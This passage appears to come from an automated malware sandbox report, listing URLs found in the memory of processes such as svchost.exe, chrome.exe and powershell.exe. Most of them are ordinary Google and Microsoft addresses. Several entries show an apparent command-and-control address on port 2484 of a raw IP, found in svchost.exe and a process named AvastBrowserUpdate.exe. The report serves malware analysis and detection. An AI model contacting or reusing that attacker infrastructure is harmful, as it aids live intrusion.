                      Source: svchost.exe, svchost.exe, 0000001B.00000003.289715682275.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289985805761.0000018CD2BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740920536.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289631609889.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289631034992.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289984604003.0000018CD28F0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289985620973.0000018CD2B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982321343.0000018CD2BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289987018099.0000018CD56DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289714837438.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289714142333.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716968637.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p
                      Source: svchost.exe, 00000013.00000003.289526236370.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289984604003.0000018CD28F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15pkernelbasentdllkernel32GetProcessMitigatio
                      Source: svchost.exe, 00000013.00000002.289526844219.000000000073C000.00000004.00000010.00020000.00000000.sdmp, SettingSyncHost.exe, 00000014.00000002.289411272952.000000000274D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15px
                      Source: AvastBrowserUpdate.exe, 00000034.00000002.289952711839.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.208.159.170:2484/logo.png
                      Source: AvastBrowserUpdate.exe, 00000034.00000002.289952711839.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.208.159.170:2484/logo.pngX
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289676519430.000060C400054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                      Source: chrome.exe, 00000023.00000002.289678803219.000060C400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                      Source: chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
                      Source: chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowsers
                      Source: chrome.exe, 00000023.00000002.289687588230.000060C400A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289691407517.000060C400D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                      Source: chrome.exe, 00000023.00000002.289687588230.000060C400A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardion.enabled)
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                      Source: chrome.exe, 00000023.00000002.289679394257.000060C400314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                      Source: chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289540073156.0000022B3EDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BC11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A44005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A44005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXzTn
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/40644738
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/40644850
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42263540
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42264383
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265636
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265637
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265720
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265782
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265792
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265794
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265839
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265854
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265958
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42266070
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42266183
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42266319
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42266364
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42266842
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42267038
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beastacademy.com/checkout/cart
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
                      Source: chrome.exe, 00000023.00000002.289681011387.000060C4004D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689578179.000060C400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.ebay.com/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.godaddy.com/go/checkout
                      Source: chrome.exe, 00000023.00000002.289688177482.000060C400AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000023.00000003.289661680901.000060C401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686622214.000060C400944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: chrome.exe, 00000023.00000002.289693252013.000060C400FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688177482.000060C400AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289690506994.000060C400CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: chrome.exe, 00000023.00000002.289683322839.000060C400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289683185028.000060C400729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
                      Source: chrome.exe, 00000023.00000002.289692126872.000060C400E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661680901.000060C401030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 00000023.00000002.289676241786.000060C400004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                      Source: chrome.exe, 00000023.00000002.289676241786.000060C400004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: chrome.exe, 00000023.00000002.289678110115.000060C4001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                      Source: chrome.exe, 00000023.00000003.289641198788.000036D0000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289641155847.000036D0000D0000.00000004.00000800.00020000.00000000.sdmp, AvastBrowserUpdate.exeString found in binary or memory: https://clients2.google.com/cr/report
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://clients2.google.com/service/check2?crx3=true
                      Source: chrome.exe, 00000023.00000002.289678110115.000060C4001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692653275.000060C400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289684325182.000060C4007A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686622214.000060C400944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289684952141.000060C400834000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 00000023.00000002.289687154511.000060C4009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                      Source: chrome.exe, 00000023.00000002.289684565664.000060C4007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                      Source: chrome.exe, 00000023.00000002.289684565664.000060C4007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                      Source: chrome.exe, 00000023.00000002.289684565664.000060C4007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://clients5.google.com/tbproxy/usagestats
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                      Source: svchost.exe, 00000013.00000003.289483287836.0000000002F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: svchost.exe, 00000013.00000003.289483287836.0000000002F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: svchost.exe, 0000001B.00000003.289713435685.0000018CD5617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289713339239.0000018CD5617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                      Source: svchost.exe, 0000001B.00000003.289713435685.0000018CD5617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289713339239.0000018CD5617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BD2763DD2
                      Source: chrome.exe, 00000023.00000002.289681011387.000060C4004D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689578179.000060C400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289681011387.000060C4004D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689578179.000060C400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289681011387.000060C4004D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689578179.000060C400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289681011387.000060C4004D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689578179.000060C400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                      Source: chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688177482.000060C400AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: chrome.exe, 00000023.00000002.289689995005.000060C400C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: chrome.exe, 00000023.00000002.289689995005.000060C400C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzTn
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289676241786.000060C400004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img1.blogblog.com/img/b16-rounded.gif
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/155487768
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
